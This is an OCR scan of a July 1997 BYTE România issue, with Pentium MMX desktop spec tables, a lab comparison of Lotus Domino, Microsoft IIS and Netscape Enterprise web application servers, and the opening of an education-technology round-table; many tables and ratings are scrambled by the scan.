cu cache la 13.3 ms şi folosirea UC la 550
KBps.
Pentru a măsura performanța MMX,
NSTL utilizează o procedură automată de
test furnizată de Intel care supune sistemul
unei mulțimi de solicitări multimedia:
este să deschizi o cutie, până la posibilitățile
de salvare în CMOS sau pe disc a configu-
rației. Am remarcat cu plăcere porturile
indicate pe panoul din spate, soclurile cu
ZIF (Zero Insertion Force) pentru UC şi o
documentaţie sănătoasă și clară.
[din BYTE, o publicaţie McGraw-Hill, Inc.
Adaptare - Daniel Moldovan]
Evaluările din acest raport prezintă aprecieri
ale redactorilor BYTE, bazate pe testele dirijate
de NISL, Inc., prezentate intr-un numar recent
al publicaţiei PC Digest. Pentru un exemplar al
raportului complet, contactaţi NISL la 625
Ridge Pike, Conshohochen, PA 19428; (610)
941-9600; pe internet, editors@ntsl.com, pen-
tru abonament, contactaţi Compute Pess Agora.
s.r.l. Tg.Mureş. BYTE Magazine şi NISL repre-
zintă unităţi funcționale ale The McGraw-Hill
Companies.
IULIE 1997 BYTE România
61
Greene
DESKTOP
MMX CARACTERISTICI
Dell Computer Corp. Digital Equipment Corp. “DTK Computer, Inc. DTK Computer. Inc.
Dimension XPS M200x MMX Celebris FX-2 5200MLP Quin-55M/PM200 Quin-55M/PM233
Pretul configuratiei testate $2949 $2517 $1775 $2050
Evaluarea generală Aki AAA Aki kkkhk
MICROPROCESOR
Producator si model Intel Pentium MMX 200 Intel Pentium MMX 200 Intel Pentium MMX 200 Intel Pentium MMX 233
Producător BIOS și model AMIAO5 Phoenix 4.05.12 AMI 451 PG AMI 451 PG
ISA PNPflash BIOS Vv Vv Vv Vv
Conform DMI v Vv V
Program de configurare pe Disk ROM ROM ROM
Oglindire BIOS ROM, video ROM, video ROM, video ROM, video
RAM pentru oglindire (KB) 256 1024 384 384
MEMORIE
RAM max. pe placa de bază (MB) 64 256 384 384
Tip RAM SDRAM SDRAM EDO EDO
Arhitectura memoriei Paged, fast-paged Cached, paged Fast-paged Fast-paged
Viteza memoriei 66 10 60 60
ECC RAM pe placa de bază ov “4
Instalat atât EDO cât și cache L2 V Vv V
Cache RAM ext./max. cache RAM ext. instalat 512/512 512/512 512/512 512/5192
Mapare cache RAM ext. mapare directă mapare directă mapare directă mapare directă
Arhitectură cache RAM ext. Write-back Write-back Write-back Write-back
Tip de executate RAM ext. Pipeline/SyncBurst Pipeline/SyncBurst Pipeline/SyncBurst Pipeline/SyncBurst
Viteză cache RAM ext. 12 12 8 8
DISPOZITIVE DE STOCARE
Producător și model hard drive IBM DCAA-34330 Quantum Stratus ST2100 Western Digital AC33100 Western Digital AC33100
Tip interfață hard drive Extins IDE Extins IDE Extins IDE Extins IDE
Capacitate hard drive (GB) 4.3 2.1 3.1 3.1
Timp de acces hard drive (ms) 9.5 15.56 12 12
COMPARTIMENT DE UNITATE
Compartimente de 5 inci (totale/expuse) 2/2 2/1 4/4 4/4
Compartimente de 3 inci (totale/expuse) 5/3 2/0 4/1 4/1
Producător CD-ROM, model și viteză Mitsumi TX 12T 12x Mitsumi FX1600 16x Sony CDU-511 16x Toshiba XM-5702B 12x
VIDEO
Video pe placa de bază v
Producător accelerator video/model (toate PCI) Matrox Millennium S3 Virge/GX S3 Virge VX86C988 S3 Virge VX86C988
Memorie video în configuraţia testată/maximum 4/4 4/4 4/4 4/4
Tipul de memorie video WRAM SGRAM VRAM VRAM
Rezolutia max. fara upgrade 1280x1024 1280x1024 1280 x 1024 1280x1024
64K culorila 1024 V V V
Adaptor video PNP V Vv [4 Vv
Comutare rezolutie v V V V
SLOTURI DE EXTENSIE
Arhitectură sistem ISA PCI ISA ISA
Arhitectură bus local PCI PCI PCI PCI
Sloturi cu procesor V V V V
Sloturi pe 16 biti ocupate/vacante 0/0 0/2 2/1 2/1
Sloturi cu procesor ocupate/vacante 1/2 0/2 1/2 1/2
Sloturi partajate 1 1 1 1
I/O
Număr total de porturi seriale 1 1 2 2
Tipul poitului paralel Extins Selectabil Selectabil Selectabil
Porturi SCSI-2 disponibile N/A N/A N/A N/A
Porturi EIDE disponibile 0 2 2 2
Compatibilitate PC card V V
DIVERSE
Tip carcasă Mini-tower Low-profile Mid-tower Mid-tower
Tensiune de alimentare 200 100 250 250
SUPORT TEHNIC
Adresă Web http://www.dell.com http://www.windows.digital.com http://www.dtkcomputer.com _http://www.dtkcomputer.com
ae = BYTE Best ~ =da; tet tok & Exceptional AAA Foarte Bine x Bine
N/A=nu se aplică. AA Acceptebil A Slab
62 BYTE Romania IULIE 1997
Gateway 2000 Micro Micron Electronics Polywell XI Computer Corp. XI Computer Corp.
P5-200 MicroFLEX-MMX/200 Millennia MXE P200 Poly 5200Tx XiK200 MTower XiMX200 MTower
$2124 $2295 $2628 $1750 $1899 $2099
kk Ark totottok Ai tot tok kk
Intel Pentium MMX 200 Intel Pentium MMX 200 Intel Pentium MMX 200 Intel Pentium MMX 200 AMD K6-MMX 200 Intel Pentium MMX 200
AMI4 Award A04 Phoenix 4.05 Award 4.5G Award 4.51G Award 4.51G
¥v V + v V V
v v Vv V
Disk, ROM ROM ROM ROM ROM ROM
ROM ROM, video ROM, video ROM, video ROM, video ROM, video
N/A 128 640 128 384 384
128 256 32 128 256 256
SDRAM EDO EDO EDO EDO EDO
Fast-paged - Fast-paged Fast-paged Fast-paged Fast-paged Fast-paged
8 60 60 60 10 10
Fast-paged
v V Vv v Vv V
512/512 512/512 512/512 512/512 512/512 512/512
Set asociativ în două direcţii mapare directă Set asociativ în patru direcţii mapare directa mapare directă mapare directă
Write-back Write-back Write-back Selectabil Write-back Write-back
Pipeline/SyncBurst Pipeline/SyncBurst Pipeline/SyncBurst Pipeline/SyncBurst Pipeline/SyncBurst Pipeline/SyncBurst
12 20 15 8 7 7
Maxtor Diamond Max Maxtor 85120A Western DigitalAC33100 Maxtor 85120A Maxtor 85120A8 Maxtor 85120A8
Extins IDE Extins IDE Extins IDE Extins IDE Extins IDE Extins IDE
5.1 5.1 3.1 51 4.8 4.8
11 10 10.5 9 9 9
2/1 2/2 2/2 2/2 4/4 4/4
4/1 4/1 5/3 1/1 4/2 4/2
Toshiba XM-6002B 16x Toshiba XM-5702B 12x Hitachi CDR-8130 16x Panasonic 584 12x Hitachi CDR-8130 16x Hitachi CDR-8130 16x
v V
S3 Virge/GX $3 Virge $3 Virge S3Virge 3D $3 Virge/VX $3 Virge/VX
4/8 4/8 4/4 4/4 8/8 8/8
DRAM VRAM DRAM DRAM VRAM VRAM
1280 x 1024 1280x1024 1280x1024 1280 x 1024 1280x1024 1280 x 1024
v Vv V v V Vv
V V V v V v
v V V v o V
PCI ISA ISA ISA ISA ISA
PCI PCI PCI PCI PCI PCI
v Vv v Vv V
1/1 1/2 0/4 1/2 2/1 2/1
2/1 1/3 1/3 1/4 1/4 . 1/4
1 1 1 1 1 1
1 2 2 2 2 2
Extins Extins Selectabil Selectabil Selectabil Selectabil
N/A N/A N/A N/A N/A N/A"
2 1 0 2 2 2
V v Vv V
Mini-tower Mid-tower Mini-tower Mid-tower Mid-tower Mid-tower
145 230 235 230 250 250
http://www.gw2k.com http://www.microexpress.net http://www.micronpc.web _ittp:/Awww.polywell.com —_http://www.xicomputer.com http://www.xicomputer.com
JULIE 1997 BYTE Romania 63
64 BYTE Romania
Aplicatii Web
disponibile
iferenta dintre serverele Web
simple si serverele de aplicatii
Web este ca si diferenta dintre
două tipuri de magazine: unul
în care consumatorii nu pot face altceva
decât să se plimbe prin magazin și să se uite
în catalog şi unul în care pot găsi și cumpăra,
în câteva minute, produsul pe care-l doresc.
O simplă publicare statică pe Web este
folositoare, însă furnizarea de servicii
pentru aplicaţii şi acces la bazele de date
existente este mult mai tentantă.
Oricum, distribuirea de conţinut dina-
mic şi de aplicaţii poate suprasolicita pro-
tocoalele și platformele server proiectate
iniţial pentru publicare statică de date. Con-
strângerile platformelor, integrarea unor
aplicații moştenite, distribuirea şi stocarea
de obiecte şi procesarea tranzacţiilor impun
unele limitări serioase ale bazei actuale de
produse statice Web-server, împiedicân-
du-le să funcționeze - sau de la o evoluţie
rapidă în acest sens - ca şi nişte servere de
aplicaţii optimizate şi robuste.
Pentru acest raport, am testat patru ser-
vere de aplicaţii Web, examinând trei sub
Windows NT şi unul sub Unix. Cele incluse
au fost Lotus Domino Server 4.5a for Win-
dows NT de la Lotus Development, Inter-
net Information Server (IIS) 3.0 for Win-
dows NT 4.0 de la Microsoft si Netscape -
Enterprise Server 2.01 for Windows NT si
Unix de la Netscape Communications.
Fiecare producător a avut propria agendă:
Lotus a dorit să-și sublinieze dominaţia pe
piaţa de groupware/middleware şi să-și
expună funcţionalitatea pe Web a pro-
duselor sale Notes; Microsoft a dorit să-şi
vândă sisteme de operare şi a sugerat uti-
lizatorilor să treacă la platforma Windows
NT Server; iar Netscape a dorit să-şi con-
tinue dominaţia pe piaţa serverelor Web,
printr-o forţare a noilor tehnologii inde-
PUES 19:97,
pendente de platformă și prin adăugarea
unor produse noi pe piaţă.
Adunarea produselor ar fi fost mai ușor
de făcut dacă toți producătorii s-ar fi inte-
les a o singură dată de lansare. Din păcate,
upgrade-ul Enterprise Server 3.0 de la
Netscape și Web Application Server (WAS)
3.0 de la Oracle au depășit termenul limită.
Citiţi caseta „Aceste servere au pierdut
trenul“ pentru a vedea în detaliu cum vor
afecta aceste produse grupul.
Istoria aplicațiilor Web
Pentru a publica aplicaţii Web aveţi nevoie
de multe tipuri de ajutoare, cum ar fisuport
pentru protocoale Internet, servicii pen-
să Ale,
SE [5]
“Mietaaoli iene
Information Server 3. o
Este rapid, administrarea este strâns. d
integrată cu Windows NT șieste livratcu
un pachet care conţine Index Server,
Crystal Report Writer, NetShow,
FrontPage și Active Server Page. IS
servește pagini Web statice și dinamice.
in mod rapid și dinamic.
tru stocare de date/obiecte si disponibility
groupware, cum ar fi programarea agendei
(calendaring) si planificare de grup.
Serverele testate includ majoritatea carac-
teristicilor importante, fie ca parti standard
ale pachetului, fie ca optiuni. Cele mai
importante pentru serverele de aplicatii
Web sunt suportul HTTP, unserver de baze
de date, servicii de mesaje si un motor de
căutare full- text.
Toţi cei trei producători icon HTTP
în produsele lor, însă doar Domino include,
Serverele care găzduiesc apli-
cații aduc un nou nivel de
interactivitate siturilor Web.
De David Seachrist si
Stephen Platt
in mod standard, servicii pentru baze de
date si mesaje. IIS si Enterprise Server nece-
sită servicii opționale sau terțe pentru baze
de date şi mesaje; doar Enterprise Server
oferă, în mod standard, e-mail IMAP.
Producătorii de servere au ales fie un sin-
gur suport SO - cum ar fi Microsoft, al cărui
IIS rulează doar sub Windows NT 4.0 - fie
prezintă un suport mai larg, aşa cum fac
Netscape şi Lotus. Atât Enterprise Server
cât şi Domino rulează sub diferite versiuni
de Unix, precum şi NT 3.51 şi 4.0; Domi-
no rulează chiar şi sub OS/2.
Performanţa reprezintă evident o con-
sideraţie importantă, atunci când doriți să
distribuiţi aplicaţii într-un mediu de între-
prindere. O modalitate de-a creşte perfor-
manţa este de-a adăuga UC-ului putere de
procesare. Deoarece aceasta înseamnă
înlocuirea UC-ului serverului cu un proce-
sor mai rapid, în prezent puteţi adăuga
mai multe procesoare datorită posibilităţii
de multiprocesare simetrică. Toate
serverele Web suportă SMP (Symmetric
Multiprocessing), deși unele maşini o fac
mai bine decât altele. În plus, preţul a
devenit o problemă în termeni de suport
SMP. Atât Netscape cât şi Lotus cer o taxă
suplimentară pentru versiunile SMP ale
propriilor produse; Microsoft însă n-o face.
Deţilarea nivelelor
Când un singur server deserveşte sute sau
mii de utilizatori, căderea serverului nu tre-
buie să reprezinte o posibilitate. Însă men-
ținerea a două sau mai multe servere iden-
tice pentru backup poate fi costisitoare.
Astfel, extinderea modelului client/server
la Internet necesită unele remodelări pen-
tru a-l face mai puţin costisitor şi mai tole-
rant la defecte.
Prin extinderea modelului client/server
la un scenariu multinivel, distribuiţi servicii
Proprietăţile ba-
zei de date din
Lotus Domino
Server sunt con-
figurabile din
platforme diferite,
incluzând și acest
aI 3 {; i] [PERDEA Site Manager
Enterprise Server dela = mm a.
Netscape include Site
Manager pentru administrare
de conexiuni și conţinut sub
Windows NT.
‘Use the To Do List dialog bax te view the To Do
List for a FrontPage web, and add, delete, or
"|| The information about each task is displayed in
|| labeled columns. To sort the list hy a field click
Internet Information
Server de la Micro-
soft se imbina cu
FrontPage pentru
crearea de sit Web.
Serverele de aplicatii Web pe care le-am testat oferă o bogăţie de servicii pentru platforme diferite.
care anterior au fost manevrate de la un sin-
gur server la mai multe servere. Serverele
suplimentare nu sunt duplicate ale primelor,
ci mai degrabă alternează handler-ele de ser-
viciu. Un exemplu elocvent este cel în care
un server este folosit pentru servicii de baze
de date, iar altul pentru servicii Web.
O dezvoltare interesantă, rezultând din
această deplasare către procesarea multinivel,
este conceptul agenţilor - apleturi automate
guvernate de reguli ale proceselor comerciale.
Intr-un model work-flow, un agent poate fi
proiectat să semnalizeze unui membru al
grupului de lucru căun document este pregătit
pentru analiză, doar după ce alt membru al
grupului şi-a terminat propria inspecţie.
Evenimente cum ar fi modificări ale docu-
mentelor și creări de documente acționează
ca și un declanșator pentru a lansa un agent;
apoi, după ce apare declanșarea, agentul con-
duce în mod automat o acțiune specifică.
Agenţii reprezintă, în general, un concept
mai vechi, însă crearea agenţilor în diferite
limbaje de programare, pentru a rula pe
diferite platforme, este un concept relativ nou.
În versiunea actuală, Domino suportă agenții,
însă nu şi CORBA, în timp ce Enterprise Ser-
ver suportă agenţi doar în versiunea 3.0. Cu
Microsoft IIS puteţi scrie proprii d-voastră
agenți folosind comenzi înglobate Visual Basic
într-un Active Server Page, însă nu veţi bene-
ficia de funcționalități de administrare agent
așa cum există în Lotus Domino Server.
Aplicații pentru Web
Cei trei producători oferă unelte perfor-
mante de dezvoltare de aplicaţii. Live Wire
şi LiveWire Pro de la Netscape, în combi-
nație cu suportul pentru Java și JavaScript
al Netscape Enterprise Server, au fixat sta-
diul pentru momentul actual de transfor-
mare a Web-ului în cea mai largă platformă
de dezvoltare.
Domino.Action, asistentul de creare a
unui sit dinamic, de la Lotus, vă permite să
creaţi situri cu medii de conlucrare în afaceri,
printr-o simplă completare a câmpurilor
specificate. Paginile Web, care acţionează ca
şi un depozit de pagini albe şi discuţii înșirate,
se creează virtual singure. De cealaltă parte,
situri Domino.Action mult mai complexe ar
putea necesita un timp mai lung de compi-
lare. Paginile Active Server de la Microsoft
au înglobat comenzile Visual Basic în tag-uri-
IULIE 1997 BYTE România 65
Software Lab Report
Aplicaţii Web la serviciul vostru
le HTML.
Aplicațiile necesită baze de date iar apli-
caţiile Web nu fac excepţie. Modul de împa-
chetare al bazelor de date de sub Netscape se
va schimba în curând, însă actualul Live Wire
Pro (care include serverul de baze de date al
SERVEBE: PEN.IERU APLICATII WEB
CEL MAI BUN
| Introduction duction
Microsoft Internet
InformationServer 3.0 li
Informix) reprezintă 0 optiune de 695$. IIS | Microsoft Internet
necesită Microsoft SQL Server (849$ licența — Information Servera = a
pentru unsingur server) pentruaadaugaser- câştigat de data asta | = oe
vicii de baze de date de capacitate industri- competitia. Documentation |
ală la serverul Web. Notes nu este relațional, FR ELICE RIA
însă permite o stocare de conţinut bogat pen- ea AC Ride . N
x ; us Domino icrosoft Interne e
tru informaţie nestructurată, cum a fi doc- Server 4.5a Information Eta ie Enterprise Server
umente de prelucrare de texte şi fişiere Server 3.0 Server (Unix) (Windows NT)
multimedia. Toate serverele, pe care le-am oo $995 Bundled with Windows $1295 $1295
testat, se conectează la baze de date tra- NT Server ($809)
ditionale prin ODBC. TEHNOLOGIE = Ak ok ttt tk i AA
Nu toate datele corespund bazelor de date IMPLEMENTARE kk AAA AAA AAA
tradiționale. Aceste servere furnizează o PERFORMANȚĂ 4 AAA AAA kkk
: : ee
eee full text, care e permite să obţineţi Mio. AAA ax ne foe
informaţia care n-a fost stocată uşor în NSTALARE or iu E Lia
vechile formate de tabele de baze de date cu APREGIERE
coloane şi rânduri. Astfel de informaţii GENERALĂ AA AAA tot tok
includ date din comunicate de presa ȘI AA AAA Excepţioani AAA A Foarte Bine XA Bine AA Acceptabil x Slab
broşuri de produse.
Domino suportă cele mai multe formate
de documente şi, opţional, vă permite să
includeți mesajele poştale în procesul de
căutare, ceea ce permite și o baleiere a
bazelor de date Notes. Index Server care vine
înglobat în IIS, permite căutări indexate ale
documentelor HTML, text şi MS Office;
puteți adăuga şi alte formate cu filtrul Soft-
ware Development Kit al Microsoft. Enter-
prise Server suportă, în mod curent, doar
HTML şi text şi nu permite actualizări ale
indexului pe baza fişierelor modificate, în
109 0080» N oo ARHITECTURA OBIECT
Sisteme deschise și sisteme proprietate
66 BYTE Romania.
În această epocă a componentelor software, distribuirea aplicaţiilor coboară către dis-
tribuirea de obiecte. Pentru arhitecturile obiect există două posibilități: DCOM și CORBA.
DCOM (Distributed Component Object Model) de la Microsoft este construit pe tehnologii
ActiveX și OLE. DCOM folosește Windows NT Server însă nu și Unix - care este standardul
istoric de facto pentru serverele Internet. Prin urmare, dacă doriți să folosiţi DCOM, pentru
distribuirea aplicaţiilor, veţi fi înţepenit lângă Microsoft. În prezent însă, Software AG are un
produs în versiune beta care extinde OLE și ActiveX la serverele Unix.
Lotus și Netscape, pe de altă parte, folosesc CORBA (Common Object Request Broker
Arhitecture), care oferă o arhitectură obiect mult mai completă decât DCOM. Specificată
de OMG (Object Management Group), CORBA promite o modalitate de implementare a
obiectelor care să fie partajată între mașini, chiar și atunci când aceste obiecte rulează sub
sisteme de operare diferite.
Netscape planifică să ofere JavaScripting pentru Java, obiecte CORBA și suport pentru
servicii CORBA și IIOP, odată cu lansarea lui Netscape Enterprise Server 3.0 în al doilea tri-
mestru al acestui an. Lotus, la rândul său, planifică pentru această vară o prezentare a claselor
back-end Domino via Java și extinde această prezentare la IIOP pentru sfârșitul anului.
Caracteristicile de fond ale CORBA sunt independenţa de platformă și rezervele pentru
procesarea tranzacţiilor ca și parte a specificaţiilor sale. DCOM reprezintă o soluţie pentru
o platformă singulară iar serviciile de tranzacţie Microsoft sunt construite la vârful DCOM;
se mândrește cu o bază instalată de peste 50 milioane de utilizatori și este strâns integrat cu
Windows SO.
Netscape nu este singur în tratarea ca o arhitectură proprietară a DCOM, însă susţine că,
în timp ce DCOM este un mediu de aplicație complet, CORBA este pur și simplu o mixare de
specificaţii asamblate din mai multe idei ale producătorilor de software despre cum să inter-
pretaţi și să implementați obiectele distribuite.
Dacă istoria reprezintă un indiciu, o tehnologie de conexiune între DCOM și CORBA va
evolua iar discuţiile se vor diminua. În continuare, va trebui să vă așteptați la un zgomot
destul de mare pentru realizările fiecăruia.
EU BEES 9:9.7
același mod în care era permisă indexarea
funcţiilor în alte servere.
Toţi producătorii produc componente de
broadcasting pentru distribuirea informaţiei
în timp real și la cerere. NetShow de la
Microsoft oferă streaming şi audio-video la
cerere precum și broadcasting al fişierelor
folosind HTTP. Elvine înglobat cu IIS și fără
un cost suplimentar. Domino.Broadcast de
la Lotus oferă distribuţie de text streaming
şi obiecte OLE via PointCast pentru un preţ
adiţional de 1295$, cu un serviciu video
suplimentar planificat pentru lansarea de la
sfârşitul acestui an. Media Server de la
Netscape furnizează în mod curent audio
streaming.
Nici un server Web nu poate fi livrat fără
unelte de creare de sit sau de administrare.
Domino.Action de la Lotus, FrontPage de la
Microsft şi extensiile FrontPageServer şi Na- -
vigator Gold de la Netscape, toate creează ra-
pid şi ușor situri Web. Deşi nu atât de grafic
ca şi Frontpage, Domino.Action configurea-
ză rapid medii Web de colaborare, care supor-
tă discuţii orientate şi biblioteci de documente.
Lotus Domino Server 4.5a
Infrastructura multinivel şi serviciile group-
ware fac din Lotus Domino Server o posi-
bilitate atractivă pentru un server de aplicaţii
Web. Domino folosește stocarea de date cu
conţinut bogat de la Lotus Notes, furnizează
servicii middleware pentru a trata incom-
patibilităţile dintre formatele de fişiere şi
oferă o cale de upgrade pentru toleranța la
defecte şi echilibrarea încărcării. Această
bază bogată de caracteristici afectează per-
formanțţa și prea puţine servicii sunt con-
*
Aplicatii Web la serviciul vostru | Software Lab Report
CoA ROA CO TE OR Leet bos :
Microsoft
forme standardelor Internet. Lotus isi plani-
fică să extindă serios posibilităţile Domi-
no-ului, până la sfârşitul acestui an.
Totce putem spune, în acest moment, este
că Enterprise Server 3.0 arată bine pe hârtie.
Serviciile workgroup includ directoare, Lotus Domino Netscape Netscape
Lain d bibl ded 45a IIS 3.0 Enterprise Enterprise
Planiiicare de grup, oiouoteca (E. Gocu- (Windows NT) (WindowsNT) Server2.01 Server2.01
mente, fluxul activităţii, forum şi știri, toate (Unix) (Windows NT)
ajutând colaborarea între angajaţii com- so suportat IBMAIX,IBM NT4.0 DECUnix, NT4.0,NT3.51
paniei. Domino oferă cel mai mare suport OS/2, HP-UX, IBMAIX,SGI_ (also Unixand
pentru aceste functii, fara a fi nevoie de adao- Se gees Solaria, Macintneh)
suri, însă folosirea la maximum a avantajelor Macintosh
acestor servicii necesita un client Notes, cum Tehnologie de obiecte ee as es
ar fi Notes desktop (69$ de client). Webli- nee + None: DCOM CORBA .. CORBA.
; us ostul pentru suport
cats WA pa OEe lug-in de 29$ reproduce multiprocesor $2995 Fără taxă $5593 $5593
conţinutul sitului în baza de date a unui client
Notes împreună cu unele servicii Notes, pen- SERVICII STANDARD/COMPONENTE
. : Server de baza de date V A A A
tru o navigare off-line. asia ceai i ne
Domino este singurul program testat de oe — sis vide
: : E Gopher V
noi care extinde OLE de la Microsoft la GMTEIRANNE 2 2000520 pa pat A A)
clienții Macintosh precum şi la clienţii POP3 A A A
Windows și este, de asemenea, singurul care Streaming audio ares A eae
rulează sub OS/2 - deloc surprinzător, dato- Streaming video Vv
rita proprietatii IBM asupra Lotus. Lotus Directory/address eo e N ae
Domino Server este câştigătorul actual il e Ata
. . wi Servicii bibliotaca de documente
pentru crearea şi publicarea unui sit Web, cu şi control versiune A 7 Vv
aplicatii de colaborare in procesul de activi- Actiuniworkflow vw sata skis
tate. Setul bogat de functiial Domino-ului = = 2
a a. SECURITATE
îl face o opțiune mai puţin atractivă pentru Suport S-HTTP i, i
publicarea simplă de conţinut static. Supot SSL. aia sia
i (2.0și 3.0) SSi20 = ov V
Microsoft Internet Criptarea fișierelor stocate Notes
Information Server 3.0 Semnaturidigitale Notes
Deşi IIS duce lipsă de funcţii de stocarea FUNCŢII ADMINISTRARE SERVER
obiectelor, mesagerie şi componente de Opţiuni pentru configurări :
procesare în colaborare, pe care Domino le De lil v Li și v
oferă suplimentar, el este bine integrat cu sis- Bie Meee M =
Secure remote
temul de operare NT Server. IIS mosteneste feel Vv Vv a Vv
toate serviciile aplicabile NT, insa ruleaza ACCEA DAE DATE
doar sub NT. Microsoft a dovedit că este bun 5
: CO ENG Ea Tehnologia trasfer/procesareA A A
la distragerea atentiei de la slăbiciunile IIS, seic EA SARII ga A A A
lansând produsele Active Server Pages, Index Apelproceduristocate W Vv
Server, NetShow si FrontPage care sunt Editor de rapoarte inclus Vv A A
impresionante. Pentru a furniza servicii
: nae ° ant paria a furniz oe DEZVOLTAREA APLICAȚIILOR
aze de date cu adevărat impresionante E norul nivel senversentn
necesită server SQL Microsoft. mașină virtuală Java v v v
Suplimentar faptului că a prezentat un Script ActiveX Vv WinCGI
pachet impresionant, IIS a fost cel mai Compilers ipo v
rapid server pe care l-am testat. Acestea sunt | “ i v v
două motive serioase de-a merge acolo unde Se end Vi vi v
Microsoft vrea să mergeţi astăzi SUPE AARI di
Bet Suport NSAPI Vv
Netscape Enterprise Se se
Server 2.01 CAUTARE FULL-TEXT
E eS | : Formate de fisier
nterprise Server a mers mult ca şi server pi opiitaLă Vv pi
Web static, însă pentru aplicaţiile Web ați CECO Zis sa
prefera noile tehnologii care sosesc cu versiu- indexării documentelor. v
nea 3.0. Lista este lunga (vezi caseta ,,Aces- Căutare după atributul
: cues documentului (metadata) WY V
te servere au pierdut trenul“) şi includ o Pyciliiy dă ala 4 we
administrare de conţinut distribuită și
îmbunătățită, suport pentru baze de date, ERE DE CONȚINUT ȘI ADMINISTRARE DE SIT
agenți inteligenţi şi CORBA (Common ii i a
Object Request Broker Arhitecture). Gaia
Y= da.
Notes =caracteristica disponibilA la clientii Lotus Notes. WinCGI= suport OLE pentru clienti Windows via WinCGl.
IULIE 1997 BYTE Romania 6/7
Software Lab Report | Aplicaţii Web la serviciul vostru
Aceste servere au pierdut trenul
Nici Enterprise Server 3.0 de la Netscape si
nici WAS 3.0 de la Oracle n-au fost pe deplin
gata când am efectuat testele. Oricum, ambele .
merită o atenţie dacă evaluaţi servere.
Netscape Enterprise Server 3.0
Cu lansarea în această primăvară a Enterprise
Server 3.0, Netscape speră să descentralizeze
administrarea siturilor Web, prin trecerea res-
Enterprise Server 3.0 suportă admi-
» nistrarea de la distanţă de oriunde.
la conţinutul pe care l-au creat.
ponsabilităţii pentru administrarea de conţinut
de la Webmasteri la creatorii de conţinut. Ideea
este de a-i lăsa pe utilizatori să adauge docu-
mente și directoare siturilor lor și de-a deter-
mina, din propriul navigator, drepturile de acces
Noua lansare adaugă funcţii de căutare full-
text cum ar fi actualizări automate de index, per-
miterea unui acces imediat la căutări ale datelor
proaspăt schimbate și căutare după conținut,
sau după atribute de document, cum ar fi: autor,
titlu și date modificate. Procesarea informaţii-
lor pe baza regulilor - în mod similar cu tehnolo-
gia work-flow în pachetele groupware proprie-
tare - va fi adăugată de asemenea sub forma
unor agenți inteligenţi declanșaţi de evenimente
specifice.
Protocolul LDAP furnizează o interfață pen-
tru serviciu open-directory pentru administrare
de servere interoperabile în timp ce noile funcţii
de administrare distribuită permit o configu-
rare de servere sincronizate.
Pe măsură ce comerțul Internet va crește,
vor fi necesare baze de date puternice şi funcţii
de procesare a tranzacţiilor. Proceduri înmaga-
zinate, conexiuni de baze de date multiple și
tranzacții persistente vor fi toate funcţii pe care
Enterprise Server 3.0 le va suporta. În plus, vor
fi adăugate conexiuni native cu baze de date
Informix și Oracle.
Oracle Web Application Server 3.0
În loc să încerce să intre pe piața competitivă
a serverelor Web, Web Application Server
(WAS) 3.0 se folosește de puterea deţinută
de Oracle în tehnologia bazelor de date și a
procesării tranzacţiilor, pentru a furniza o infra-
structură, pentru furnizarea aplicaţiilor tranzac-
ţionale. WAS 3.0, lansat cu un Web server de
la Spyglass Technologies, lucrează cu majori-
tatea altor servere Web populare (incluzând
IIS și Enterprise Server) și rezolvă problema
interfeței dintre aplicaţii proprietare prin izo:
larea aplicaţiilor de server. Acest model de izo-
lare a procesului forțează fiecare aplicaţie să
PL/SQL Agent Administration
Create PL/SQL
Transaction Creation
a ate
Agent Transactional Services
=
Application (SB
Transaction Name Ss ae
| Commit Transaction URE Pstypisqiimert Corwen
| Roliback Transaction URL. jfshipisqlmort Roiback
| Transactional RM List |
WAS 3.0 foloseste agenti pentru admi-
- nistrarea tranzactiilor bazelor de date.
ruleze ca sio instanta separata de proces per-
sistent, in timp ce un mecanism de expediere
HTTP de la serverul HTTP furnizează legătura.
Tehnologia de la Oracle folosește ORB
(Object Request Broker) Web conform COR-
BA și cartușe care pot fi fixate în broker pen-
tru a furniza servicii de back-end variate, pen-
tru interfaţa cu baza de date Oracle SOL,
mașina Virtual Java, baze de date conform
ODBC și alte surse de date. Cartușele rulează
independent însă, pot, de asemenea, comu-
nica cu aplicaţii sau cu alte cartușe fără a fi
legate de nivelul HTTP. Cartușele pot fi de
asemenea distribuite la servere în locul unui
singur server, așa cum este cazul cu
WebServer 2.1, versiunea pre-CORBA a
WAS 3.0
Deși are dinţii un pic cam lungi, Enterprise
Server 2.01 s-a comportat respectabil în
competiția cu noii competitori.
O piață competitivă
Când ne uităm la Web ca și la o rampă de
lansare pentru procesarea multinivel, veştile
proaste sunt următoarele: Când a fost con-
ceput acest articol (la începutul lui aprilie),
nimeni nu oferea un produs care să trateze
toate aspectele obstacolelor din calea oferiri
de servicii de aplicaţii Web într-o manieră
robustă, transparentă, optimizată și eficien-
tă. Veştile bune sunt că în general competiţia
a îndemnat producătorii să umple golurile din
propriile tehnologii într-un ritm uluitor.
Pe baza a ceea ce am văzut în lansările
curente şi a produselor beta, în curând
companiile de toate mărimile vor fi capabile
să folosească siturile Web ca şi medii de
procesare în colaborare.
Procesarea în colaborare bazată pe Web
INFORMAȚII DESPRE PRODUS
68 BYTE Romania IULIE 1997
necesită totuși îmbunătăţiri tehnologice şi de
infrastructură pentru a rezolva adevăratele
probleme economice. Oricum, o piaţă din ce
în ce mai competitivă va continua să sorteze
produsele mai bune cu un preț mai mic. Bă
David Seachrist a testat timp de 10 ani pentru
NSTL tipuri diferite de programe. Poate fi con-
tactat la dseachrist@prodigy.com. Stephen Platt
este director NSTL pe domeniul publicatiilor
electronice. Poate fi contactat la
editors@nstl.com.
[din BYTE, o publicaţie McGraw-Hill, Inc.
Adaptare - Daniel Moldovan]
Schimbările tehnologice
si scoala în România
ehnologiile educaţionale noi ar
putea contribui la un învăţământ
modern, care să ofere societăţii
oamenii capabili să lucreze la
nivelul cerințelor unei societăți moderne. La
CERE, una dintre mesele rotunde a fost ded-
icată acestei probleme. Mulţumesc invi-
taţilor că au găsit timpul necesar participării
şi regret că interesul din partea firmelor și
publicului participant la CERE a fost mai
mult decât modest. Dar, iată şi desfăşurarea
discuţiilor:
Darvas Attila: Ce rol are
CNFIS (Consiliul Naţional
Pentru Finanţarea Învă-
tamantului Superior) $i cum
vede CNFIS informatizarea
învățământului în România?
Ce programe şi ce resurse
există pentru universităţi ?
Silviu Cucerzan (CNFIS):
Implementarea programelor
se va face, în primul rând, cu
sprijinul Băncii Mondiale.
Nu sunt bani străini, dar alo-
carea lor este doar o parte din
activitatea consiliului. Con-
siliul alocă fondurile de la
buget pentru instituţiile de
învățământ superior, sis-
temul de burse şi sunt multe
atribuţii. În ultimul timp, o
